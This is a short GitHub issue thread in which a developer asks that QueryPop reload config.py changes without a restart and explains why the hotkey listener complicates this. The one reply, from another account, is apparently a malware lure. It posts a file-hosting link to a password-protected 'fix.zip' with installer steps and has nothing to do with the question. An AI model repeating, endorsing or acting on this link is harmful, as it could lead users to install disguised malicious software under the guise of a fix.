### ISSUE TITLE
The application should not require restarting the app after updating the config.py

### ISSUE THREAD

**Issue by drankush** [drankush/QueryPop#3]
Python application are slow to start, when trying iteratively the browser size, LLM service provider (gemini/meta), changing instruction prompt etc, it should not require user to restart the application every time.

But reloading APPLICATION_SHORTCUT on-the-fly is indeed more challenging because the keyboard.GlobalHotKeys listener is running in a separate thread, and we can't directly change the hotkeys it's listening for after it has started (unless I use event to stop it and restart). So it will still require user to restart application when changing the listener shortcut key.

**Comment by pabloaz10** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."
